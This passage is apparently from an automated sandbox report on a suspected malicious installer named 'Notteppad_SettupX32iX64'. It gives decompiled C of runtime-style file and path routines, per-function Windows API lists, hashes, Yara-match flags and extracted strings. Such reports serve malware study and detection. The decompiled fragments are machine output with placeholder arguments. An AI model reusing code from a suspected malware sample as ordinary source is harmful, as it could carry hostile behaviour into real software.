				void* _t49;
				intOrPtr _t50;
				unsigned int _t55;
				void* _t58;
				unsigned int _t59;
				signed int _t63;
				signed char _t67;
				signed int _t70;
				signed int _t72;
				void* _t74;
				signed int _t76;
				void* _t82;
				void* _t86;
				void* _t87;
				void* _t89;
				void** _t90;

				_t90 = _t89 - 0x12c;
				_t37 = _t90[0x50];
				if(_t37 == 0) {
					L0040A388();
					_t87 = 0;
					 *_t37 = 0x16;
					goto L20;
				} else {
					if( *_t37 == 0) {
						L0040A388();
						 *_t37 = 2;
						return 0;
					} else {
						_t86 =  &(_t90[7]);
						_t90[2] = 0x104;
						_t90[1] = _t37;
						 *_t90 = _t86;
						L0040A380();
						_t74 = _t86;
						if(_t90[7] == 0) {
							goto L8;
							L8:
							_t63 =  *_t74;
							_t74 = _t74 + 4;
							_t42 = _t63 - 0x01010101 &  !_t63 & 0x80808080;
							if(_t42 == 0) {
								goto L8;
							} else {
								if((_t42 & 0x00008080) == 0) {
									_t42 = _t42 >> 0x10;
									_t74 = _t74 + 2;
								}
								_t43 = _t74;
								asm("sbb eax, 0x3");
							}
						} else {
							do {
								_t70 =  *_t74;
								_t74 = _t74 + 4;
								_t55 = _t70 - 0x01010101 &  !_t70 & 0x80808080;
							} while (_t55 == 0);
							if((_t55 & 0x00008080) == 0) {
								_t55 = _t55 >> 0x10;
								_t74 = _t74 + 2;
							}
							asm("sbb edx, 0x3");
							_t82 = _t74 - _t86;
							_t72 =  *(_t90 + _t82 + 0x1b) & 0x000000ff;
							_t43 = _t86 + _t82;
							if(_t72 != 0x2f && _t72 != 0x5c) {
								 *_t43 = 0x5c;
								_t43 = _t86 + _t82 + 1;
							}
						}
						_t58 = _t86;
						 *_t43 = 0x2a;
						goto L12;
						L15:
						asm("sbb ebx, 0x3");
						_t59 = _t58 - _t86;
						 *_t90 = _t59 + 0x11c;
						_t48 = malloc(??);
						_t87 = _t48;
						if(_t48 == 0) {
							L0040A388();
							 *_t48 = 0xc;
						} else {
							_t67 = _t59 + 1;
							_t49 = _t48 + 0x118;
							if(_t67 < 4) {
								if(_t67 != 0) {
									 *_t49 =  *_t86 & 0x000000ff;
									if((_t67 & 0x00000002) != 0) {
										 *((short*)(_t49 + _t67 - 2)) =  *(_t86 + _t67 - 2) & 0x0000ffff;
									}
								}
							} else {
								 *((intOrPtr*)(_t49 + _t67 - 4)) =  *((intOrPtr*)(_t90 + _t67 + 0x18));
								_t49 = memcpy(_t49, _t86, _t59 >> 2 << 2);
								_t90 =  &(_t90[3]);
							}
							_t50 = E00409BB0(_t49, _t87);
							 *((intOrPtr*)(_t87 + 0x110)) = _t50;
							if(_t50 == 0xffffffff) {
								 *_t90 = _t87;
								_t87 = 0;
								E00408660();
							} else {
								 *_t87 = 0;
								 *(_t87 + 0x114) = 0;
								 *((short*)(_t87 + 4)) = 0x110;
							}
						}
						L20:
						return _t87;
						goto L30;
						L12:
						_t76 =  *_t58;
						_t58 = _t58 + 4;
						_t17 = _t76 - 0x1010101; // -16842967
						_t46 = _t17 &  !_t76 & 0x80808080;
						if(_t46 == 0) {
							goto L12;
						} else {
							if((_t46 & 0x00008080) == 0) {
								_t46 = _t46 >> 0x10;
								_t58 = _t58 + 2;
							}
						}
						goto L15;
					}
				}
				L30:
			}
























                                      0x00409d64
                                      0x00409d6a
                                      0x00409d73
                                      0x00409f28
                                      0x00409f2d
                                      0x00409f2f
                                      0x00000000
                                      0x00409d79
                                      0x00409d7c
                                      0x00409f08
                                      0x00409f0f
                                      0x00409f21
                                      0x00409d82
                                      0x00409d82
                                      0x00409d86
                                      0x00409d8e
                                      0x00409d92
                                      0x00409d95
                                      0x00409d9f
                                      0x00409da1
                                      0x00000000
                                      0x00409df0
                                      0x00409df0
                                      0x00409df2
                                      0x00409dff
                                      0x00409e04
                                      0x00000000
                                      0x00409e06
                                      0x00409e0b
                                      0x00409ee8
                                      0x00409eeb
                                      0x00409eeb
                                      0x00409e15
                                      0x00409e17
                                      0x00409e17
                                      0x00409da3
                                      0x00409da3
                                      0x00409da3
                                      0x00409da5
                                      0x00409db2
                                      0x00409db2
                                      0x00409dbe
                                      0x00409ef8
                                      0x00409efb
                                      0x00409efb
                                      0x00409dc8
                                      0x00409dcb
                                      0x00409dcd
                                      0x00409dd2
                                      0x00409dd8
                                      0x00409de4
                                      0x00409de7
                                      0x00409de7
                                      0x00409dd8
                                      0x00409e1f
                                      0x00409e21
                                      0x00409e21
                                      0x00409e47
                                      0x00409e4b
                                      0x00409e4e
                                      0x00409e56
                                      0x00409e59
                                      0x00409e5e
                                      0x00409e62
                                      0x00409f4f
                                      0x00409f54
                                      0x00409e68
                                      0x00409e68
                                      0x00409e6b
                                      0x00409e74
                                      0x00409eca
                                      0x00409ecf
                                      0x00409ed4
                                      0x00409edb
                                      0x00409edb
                                      0x00409ed4
                                      0x00409e76
                                      0x00409e7f
                                      0x00409e85
                                      0x00409e85
                                      0x00409e85
                                      0x00409e89
                                      0x00409e8e
                                      0x00409e97
                                      0x00409f40
                                      0x00409f43
                                      0x00409f45
                                      0x00409e9d
                                      0x00409ea2
                                      0x00409ea9
                                      0x00409eb3
                                      0x00409eb3
                                      0x00409e97
                                      0x00409eb7
                                      0x00409ec3
                                      0x00000000
                                      0x00409e24
                                      0x00409e24
                                      0x00409e26
                                      0x00409e29
                                      0x00409e33
                                      0x00409e38
                                      0x00000000
                                      0x00409e3a
                                      0x00409e3f
                                      0x00409e41
                                      0x00409e44
                                      0x00409e44
                                      0x00409e3f
                                      0x00000000
                                      0x00409e38
                                      0x00409d7c
                                      0x00000000

                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.271740599.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.271723163.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.271783698.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.271790744.000000000040C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.271814853.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.271824359.0000000000425000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.271831250.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.271839623.000000000042B000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_Notteppad_SettupX32iX64.jbxd
                                      Similarity
                                      • API ID: _errno$_fullpathmalloc
                                      • String ID:
                                      • API String ID: 1031002091-0
                                      • Opcode ID: ce795a2635ad3b05727b3c67cbe4d25af37f8b6b50032a876bba419dd9c408c1
                                      • Instruction ID: 1e137775dab4e1dbd69cb6b5fddc78eb9f796be5212f8472db7a0612a04b62d8
                                      • Opcode Fuzzy Hash: ce795a2635ad3b05727b3c67cbe4d25af37f8b6b50032a876bba419dd9c408c1
                                      • Instruction Fuzzy Hash: 1641E0712046098BE714DE24C8467AB77D1EF82308F08447ED9849B3D6EB7E9D4AC78A
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 006E9DBB Relevance: 7.6, APIs: 5, Instructions: 74COMMON
                                      Download Yara Rule
                                      APIs
                                      • GetSystemInfo.KERNEL32(?), ref: 006E9DD5
                                      • GetModuleHandleExW.KERNEL32(00000004,006E9C88,?), ref: 006E9DE9
                                      • GetCurrentProcess.KERNEL32(?,?,0000000C), ref: 006E9E00
                                      • GetModuleInformation.PSAPI(00000000), ref: 006E9E07
                                      • VirtualQuery.KERNEL32(?,00000000,0000001C,006E9763,00000000), ref: 006E9E22
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.271913342.00000000006E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006E0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_6e0000_Notteppad_SettupX32iX64.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Module$CurrentHandleInfoInformationProcessQuerySystemVirtual
                                      • String ID:
                                      • API String ID: 1573062435-0
                                      • Opcode ID: 65946006f690ca50859a8fe7739fe2d30fb2ff0be98fa7f717fef7f7346bf8aa
                                      • Instruction ID: 95d8b37ec903cc192389f10fc7bb1c86a7d13e2d0bec66e6fea168b5bd6a01b0
                                      • Opcode Fuzzy Hash: 65946006f690ca50859a8fe7739fe2d30fb2ff0be98fa7f717fef7f7346bf8aa
                                      • Instruction Fuzzy Hash: 2E21C372A0024AABEF20DBEACC95BFE77ABEF44711F040015E612E22D1D6349881CB71
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00409851 Relevance: 7.6, APIs: 5, Instructions: 71COMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.271740599.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.271723163.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.271783698.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.271790744.000000000040C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.271814853.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.271824359.0000000000425000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.271831250.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.271839623.000000000042B000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_Notteppad_SettupX32iX64.jbxd
                                      Similarity
                                      • API ID: mbstowcssetlocalewcstombs
                                      • String ID:
                                      • API String ID: 4174842464-0
                                      • Opcode ID: 708dbc9e281e25611127d1e5353e2144fde7828d0e90fe5cc51af51b514d4d15
                                      • Instruction ID: d6f74d08e4f01a8e68750589103c137a535fab5d44ab896d8436be5a42cd2b4e
                                      • Opcode Fuzzy Hash: 708dbc9e281e25611127d1e5353e2144fde7828d0e90fe5cc51af51b514d4d15
                                      • Instruction Fuzzy Hash: 083109709187159ECB10AF65C1546AEBBF0FF84344F00883EE888A7351E7789955DB86
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00403950 Relevance: 7.6, APIs: 5, Instructions: 68filestringCOMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.271740599.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.271723163.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.271783698.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.271790744.000000000040C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.271814853.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.271824359.0000000000425000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.271831250.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.271839623.000000000042B000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_Notteppad_SettupX32iX64.jbxd
                                      Similarity
                                      • API ID: fwrite$strlen
                                      • String ID:
                                      • API String ID: 3341123317-0
                                      • Opcode ID: 4e5357ea7d3dd1594e5c5bafb02f6fd86f0f3a86a191ce34ea18af2187bcb2dc
                                      • Instruction ID: d76fec5d836d608524c0ba963f2085c4795d69c9ab879dabfc721c3c12d35278
                                      • Opcode Fuzzy Hash: 4e5357ea7d3dd1594e5c5bafb02f6fd86f0f3a86a191ce34ea18af2187bcb2dc
                                      • Instruction Fuzzy Hash: 0021E6B19083158FD710EF25C48424FBFE4BF94358F05892EE8D8A7351E6799A898F87
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 006E35F2 Relevance: 7.6, APIs: 3, Strings: 2, Instructions: 53memoryCOMMON
                                      Download Yara Rule
                                      APIs
                                      • memcpy.NTDLL(?,006E2EB5,0000006C,?,00000000), ref: 006E360C
                                      • VirtualAlloc.KERNEL32(00000000,?,00001000,00000040,?,?,00000000), ref: 006E364D
                                      • memcpy.NTDLL(00000000,006E2E49,?,?,?,00000000), ref: 006E3665
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.271913342.00000000006E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006E0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_6e0000_Notteppad_SettupX32iX64.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: memcpy$AllocVirtual
                                      • String ID: !Rex$l
                                      • API String ID: 1089091998-3692501399
                                      • Opcode ID: 1cc857d5b94aef8dff741ced3d15a0b77fee593e31a36ee1e8f0f9c7e0ea71f9
                                      • Instruction ID: 50a9648d64d6f9d1d4af9d7f338b15251cc2ae708d407b52a2fa967bde54ab36
                                      • Opcode Fuzzy Hash: 1cc857d5b94aef8dff741ced3d15a0b77fee593e31a36ee1e8f0f9c7e0ea71f9
                                      • Instruction Fuzzy Hash: DF019275E013946BCB109FBA9C8AE9E37AA9B41754F104129F519AB783D2648904CB15
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 006E965A Relevance: 7.5, APIs: 5, Instructions: 47threadmemoryCOMMON
                                      Download Yara Rule
                                      APIs
                                      • VirtualAlloc.KERNEL32(00000000,000002CC,00001000,00000004), ref: 006E9670
                                      • memset.NTDLL ref: 006E967F
                                      • GetCurrentThread.KERNEL32 ref: 006E968E
                                      • GetThreadContext.KERNEL32(00000000), ref: 006E9695
                                      • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 006E96BD
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.271913342.00000000006E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006E0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_6e0000_Notteppad_SettupX32iX64.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: ThreadVirtual$AllocContextCurrentFreememset
                                      • String ID:
                                      • API String ID: 1864654505-0
                                      • Opcode ID: 8c53517c41b30e2127e0d274d567ebaa011fb10f7b81bdc5092a1179afd3ea74
                                      • Instruction ID: 520f5d08bd6d97fe1f634a382e81365f90cde471d9c0db271a3837c0c2595d47
                                      • Opcode Fuzzy Hash: 8c53517c41b30e2127e0d274d567ebaa011fb10f7b81bdc5092a1179afd3ea74
                                      • Instruction Fuzzy Hash: 0FF0A471703785AFEB305E629C88FABB76EEF41795B00453FF64541150E6715881CE74
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 006EF81E Relevance: 7.5, APIs: 5, Instructions: 33synchronizationCOMMON
                                      Download Yara Rule
                                      APIs
                                      • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,00000000,00000000,?,006EF81B,l-n,006EF535,006EF52D,006FADB0,006EF535,006E2D6C), ref: 006EF82B
                                      • InterlockedCompareExchange.KERNEL32(006EF539,00000000,00000000), ref: 006EF83D
                                      • SetEvent.KERNEL32(00000000,?,006EF81B,l-n,006EF535,006EF52D,006FADB0,006EF535,006E2D6C), ref: 006EF84E
                                      • CloseHandle.KERNEL32(00000000,?,006EF81B,l-n,006EF535,006EF52D,006FADB0,006EF535,006E2D6C), ref: 006EF85A
                                      • WaitForSingleObject.KERNEL32(006EF535,000000FF,?,006EF81B,l-n,006EF535,006EF52D,006FADB0,006EF535,006E2D6C), ref: 006EF865
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.271913342.00000000006E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006E0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_6e0000_Notteppad_SettupX32iX64.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Event$CloseCompareCreateExchangeHandleInterlockedObjectSingleWait
                                      • String ID:
                                      • API String ID: 4206309166-0
                                      • Opcode ID: c42393f65fe182d879329b4f8032b6ff9262714a51bdcda57c369c11702f9d60
                                      • Instruction ID: c4d5219d5a4353f49797713c330cb31d5a2671f6027e20e77cfa6ee639527777
                                      • Opcode Fuzzy Hash: c42393f65fe182d879329b4f8032b6ff9262714a51bdcda57c369c11702f9d60
                                      • Instruction Fuzzy Hash: AEF08235104305BBDB101FA5DC59BA67F6DEB04765F105815FE0A9A1D0D6709440CB50
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 006E7C7F Relevance: 7.5, APIs: 2, Strings: 3, Instructions: 29COMMON
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.271913342.00000000006E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006E0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_6e0000_Notteppad_SettupX32iX64.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: memcmp
                                      • String ID: dDo$if-modified-sinc$transfer-encodin
                                      • API String ID: 1475443563-3052112879
                                      • Opcode ID: 6957ee632819d41d4d74af04c8fa32748a0e9316887744d5458a1bfc7cc9acc9
                                      • Instruction ID: 5c005220ad59f5eccaa4da17e6497e2019584ea79c18f3ae8db3924268e6b4aa
                                      • Opcode Fuzzy Hash: 6957ee632819d41d4d74af04c8fa32748a0e9316887744d5458a1bfc7cc9acc9
                                      • Instruction Fuzzy Hash: D9E0DF2074A3C821D624563A2C02BB72E4BA7517AAF0008A5BE64DC287E842CD534000
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 006E7E36 Relevance: 7.5, APIs: 2, Strings: 3, Instructions: 28COMMON
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.271913342.00000000006E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006E0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_6e0000_Notteppad_SettupX32iX64.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: memcmp
                                      • String ID: access-control-expose-header$access-control-request-metho$Eo
                                      • API String ID: 1475443563-1161587764
                                      • Opcode ID: e86b36d78f35fad0eededf67ddfdc77f3dcdfbf68870032a7a81908122823a21
                                      • Instruction ID: 6a07e8a58015db8a8795132507d6630a97ce8e442b527dcd1cf77c8703b1b2c7
                                      • Opcode Fuzzy Hash: e86b36d78f35fad0eededf67ddfdc77f3dcdfbf68870032a7a81908122823a21
                                      • Instruction Fuzzy Hash: CBE0DF187CA3C821EA64652A1C02BF35E4B5B21326F1104A5FE449D387E742CD034001
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 006E7DE9 Relevance: 7.5, APIs: 2, Strings: 3, Instructions: 25COMMON
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.271913342.00000000006E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006E0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_6e0000_Notteppad_SettupX32iX64.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: memcmp
                                      • String ID: <Fo$access-control-allow-header$access-control-allow-method
                                      • API String ID: 1475443563-4037146479
                                      • Opcode ID: 478d3d0c96caf2f714590ee3f922f1f9f36d01c38d4a18825ec92ffb83861cc5
                                      • Instruction ID: 1ceb2554e4fd5ad6d6dc589681f68d8a6de38f3d5012cc62f8c1bf2629a8553c
                                      • Opcode Fuzzy Hash: 478d3d0c96caf2f714590ee3f922f1f9f36d01c38d4a18825ec92ffb83861cc5
                                      • Instruction Fuzzy Hash: 28E08C15F8E3D872EB6065261C027BB6E4B6F12369F0104E6FE08AA783E3408F179186
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 006EA9C7 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 91COMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 006E9296: SysAllocString.OLEAUT32(?), ref: 006E92E1
                                        • Part of subcall function 006E9296: SysFreeString.OLEAUT32(?), ref: 006E930E
                                        • Part of subcall function 006E9354: SysAllocString.OLEAUT32(WQL), ref: 006E9365
                                        • Part of subcall function 006E9354: SysAllocString.OLEAUT32(?), ref: 006E936C
                                        • Part of subcall function 006E9354: SysFreeString.OLEAUT32(00000000), ref: 006E93B5
                                        • Part of subcall function 006E9354: SysFreeString.OLEAUT32(00000000), ref: 006E93C0
                                      • VariantClear.OLEAUT32(00000001), ref: 006EAA6B
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.271913342.00000000006E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006E0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_6e0000_Notteppad_SettupX32iX64.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: String$AllocFree$ClearVariant
                                      • String ID: NumberOfCores$ROOT\CIMV2$SELECT * FROM Win32_Processor
                                      • API String ID: 261499160-2075090250
                                      • Opcode ID: 39e3338326d4889046deabd84e15b76480b5acf42665b5607bd2f914749f7f95
                                      • Instruction ID: 5dbeee31467671ac6680e15745a336716c8a0e7e2517984fa6d41a2d513f0600
                                      • Opcode Fuzzy Hash: 39e3338326d4889046deabd84e15b76480b5acf42665b5607bd2f914749f7f95
                                      • Instruction Fuzzy Hash: 2B317C72A01219ABCB10CBD9C9489EEB7BEEF48700B1040A9F502E7294D771AE45CBA1
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00409396 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 90stringCOMMON
                                      Download Yara Rule
                                      C-Code - Quality: 47%
                                      			E00409396(void* __eax, void* __ebx, void* __ecx, void* __edx, void* __edi) {
				void* _t100;

				while(1) {
					L19:
					__edx = __edx + 1;
					__esi = __ecx;
					 *((char*)(__edx - 1)) = __al;
					__eflags = __al;
					if(__al == 0) {
						goto L22;
					} else {
						goto L20;
					}
					while(1) {
						L20:
						__eax =  *__esi & 0x000000ff;
						__ecx = __esi + 1;
						__eflags = __al - 0x7f;
						if(__al != 0x7f) {
							goto L19;
						}
						__eax =  *(__esi + 1) & 0x000000ff;
						__edx = __edx + 1;
						__esi = __esi + 2;
						 *((char*)(__edx - 1)) = __al;
						__eflags = __al;
						if(__al != 0) {
							continue;
						}
						goto L22;
					}
					continue;
					L22:
					__eax =  *(__ebp - 0x5c);
					 *__esp = __eax;
					L00408484();
					__esp = __edi;
					__esi = __eax;
					__eflags = __eax;
					if(__eax == 0) {
						 *(__ebp - 0x2c) = 3;
						L25:
						__esp =  *(__ebp - 0x54);
						while(1) {
							L13:
							__eax =  *(__ebp - 0x34);
							__eax = E00409F60( *(__ebp - 0x34));
							__esi = __eax;
							__eflags = __eax;
							if(__eax != 0) {
								break;
							}
							 *(__ebp - 0x34) = E00409FB0( *(__ebp - 0x34));
							__eax =  *(__ebp - 0x50);
							__eflags =  *(__ebp - 0x50);
							if( *(__ebp - 0x50) != 0) {
								__edx =  *(__ebp + 8);
								 *(__ebp - 0x50) = E00408CF0( *(__ebp - 0x50),  *(__ebp + 8));
							}
							while(1) {
								__eax =  *__ebx;
								__ebx = __ebx + 4;
								__eax = E00408660(__eax);
								__eax =  *__ebx;
								__eflags = __eax;
								if(__eax == 0) {
									break;
								}
								__eflags =  *(__ebp - 0x2c) - 1;
								if( *(__ebp - 0x2c) == 1) {
									L6:
									 *(__ebp - 0x2c) = 1;
									continue;
								}
								 *__esp = __eax;
								__eax = E00409D60();
								 *(__ebp - 0x34) = __eax;
								__eflags = __eax;
								if(__eax == 0) {
									__eflags =  *(__ebp - 0x30) & 0x00000004;
									if(( *(__ebp - 0x30) & 0x00000004) != 0) {
										goto L6;
									}
									__edi =  *(__ebp - 0x38);
									__eflags = __edi;
									if(__edi == 0) {
										continue;
									}
									L0040A388();
									 *(__esp + 4) = __eax;
									__eax =  *__ebx;
									 *__esp =  *__ebx;
									__eax =  *__edi();
									__eflags = __eax;
									if(__eax == 0) {
										continue;
									} else {
										goto L6;
									}
								}
								__eax =  *(__ebp - 0x40);
								 *(__ebp - 0x4c) = 0;
								__eflags =  *(__ebp - 0x40);
								if( *(__ebp - 0x40) != 0) {
									__eax =  *__ebx;
									 *(__ebp - 0x4c) = strlen( *__ebx);
								}
								__eax =  *(__ebp - 0x4c);
								 *(__ebp - 0x50) = 0;
								__eax =  *(__ebp - 0x4c) + 2;
								__eflags = __eax;
								 *(__ebp - 0x60) = __eax;
								goto L13;
							}
							__eax =  *(__ebp - 0x20);
							__edi =  *(__ebp - 0x20);
							__eax = E00408660(__edi);
							__esp =  *(__ebp - 0x44);
							return  *((intOrPtr*)(_t100 - 0x2c));
						}
						__edi =  *(__ebp - 0x3c);
						__eflags =  *(__ebp - 0x3c);
						if( *(__ebp - 0x3c) == 0) {
							L16:
							_t20 = __esi + 0xc; // 0xc
							__edi = _t20;
							__ecx =  *(__ebp - 0x30);
							__eax =  *(__ebp - 0x48);
							__edx = __edi;
							__eax = E004089C0( *(__ebp - 0x48),  *(__ebp - 0x30), __edi);
							__eflags = __eax;
							if(__eax != 0) {
								goto L13;
							}
							__ecx =  *(__esi + 6) & 0x0000ffff;
							__eax =  *(__ebp - 0x60);
							 *(__ebp - 0x54) = __esp;
							__eax = __ecx +  *(__ebp - 0x60) + 0xf;
							__eax = __ecx +  *(__ebp - 0x60) + 0xf >> 4;
							__eax = __ecx +  *(__ebp - 0x60) + 0xf >> 4 << 4;
							__eax = E00408390(__ecx +  *(__ebp - 0x60) + 0xf >> 4 << 4);
							__esi =  *(__ebp - 0x4c);
							__esp = __esp - __eax;
							__edx = __esp + 0xc;
							 *(__ebp - 0x58) = __edx;
							__eax = __edx;
							__eflags =  *(__ebp - 0x4c);
							if( *(__ebp - 0x4c) != 0) {
								__esi =  *(__ebp - 0x4c);
								__eax =  *__ebx;
								 *(__ebp - 0x68) = __ecx;
								 *__esp = __edx;
								 *(__esp + 8) = __esi;
								 *(__esp + 4) =  *__ebx;
								 *(__ebp - 0x5c) = __edx;
								memcpy(??, ??, ??) =  *(__esp + __esi + 0xb) & 0x000000ff;
								__edx =  *(__ebp - 0x5c);
								__ecx =  *(__ebp - 0x68);
								__eflags = __al - 0x2f;
								if(__al == 0x2f) {
									L46:
									__eax =  *(__ebp - 0x4c);
									__eax =  *(__ebp - 0x4c) + __edx;
									goto L18;
								}
								__eflags = __al - 0x5c;
								if(__al == 0x5c) {
									goto L46;
								}
								__esi =  *(__ebp - 0x4c);
								__eax =  *(__ebp - 0x61) & 0x000000ff;
								 *((char*)(__edx + __esi)) = __al;
								__eax = __edx + __esi + 1;
							}
							L18:
							__ecx = 1 + __ecx;
							 *(__ebp - 0x5c) = __edx;
							 *(__esp + 8) = __ecx;
							 *(__esp + 4) = __edi;
							__edi = __esp;
							 *__esp = __eax;
							__eax = memcpy(??, ??, ??);
							__edx =  *(__ebp - 0x5c);
							__eax = strlen( *(__ebp - 0x5c));
							__eax = __eax + 0x10;
							__eax = __eax >> 4;
							__eax = __eax << 4;
							__eax = E00408390(__eax);
							__esi =  *(__ebp - 0x58);
							__esp = __esp - __eax;
							__eax = __esp + 0xc;
							 *(__ebp - 0x5c) = __eax;
							__edx = __eax;
							goto L20;
						}
						__eflags =  *((intOrPtr*)(__esi + 8)) - 0x10;
						if( *((intOrPtr*)(__esi + 8)) != 0x10) {
							goto L13;
						}
						goto L16;
					}
					__edi =  *(__ebp - 0x2c);
					__eax = 0;
					__eflags = __edi - 2;
					0 | __eflags == 0x00000000 = (0 | __eflags == 0x00000000) - 1;
					 *(__ebp - 0x2c) = __edi;
					__eflags =  *(__ebp - 0x30) & 0x00000040;
					if(( *(__ebp - 0x30) & 0x00000040) == 0) {
						__edi =  *(__ebp - 0x50);
						__eflags = __edi;
						if(__edi == 0) {
							__eax = malloc(0xc);
							 *(__ebp - 0x50) = __eax;
							__eflags = __eax;
							if(__eax != 0) {
								__eax =  *(__ebp - 0x50);
								 *(__eax + 8) = __esi;
								 *(__eax + 4) = 0;
								 *__eax = 0;
							}
							goto L25;
						}
						__eax =  *(__ebp - 0x30);
						 *(__ebp - 0x58) = __ebx;
						__eax =  *(__ebp - 0x30) & 0x00004000;
						__ebx =  *(__ebp - 0x30) & 0x00004000;
						while(1) {
							__eax =  *(__edi + 8);
							 *__esp = __esi;
							 *(__esp + 4) = __eax;
							__eflags = __ebx;
							if(__ebx != 0) {
								__eax = strcoll();
							} else {
								L0040A418();
							}
							__ecx =  *__edi;
							__edx =  *(__edi + 4);
							__eflags = __eax;
							if(__eax <= 0) {
								__edx = __ecx;
							}
							__eflags = __edx;
							if(__edx == 0) {
								break;
							}
							__edi = __edx;
						}
						__ebx =  *(__ebp - 0x58);
						 *(__ebp - 0x58) = __eax;
						__eax = malloc(0xc);
						__edx =  *(__ebp - 0x58);
						__eflags = __eax;
						if(__eax != 0) {
							 *(__eax + 8) = __esi;
							 *(__eax + 4) = 0;
							 *__eax = 0;
							__eflags = __edx;
							if(__edx <= 0) {
								 *__edi = __eax;
							} else {
								 *(__edi + 4) = __eax;
							}
						}
						goto L25;
					}
					__edx =  *(__ebp + 8);
					__eflags =  *(__ebp + 8);
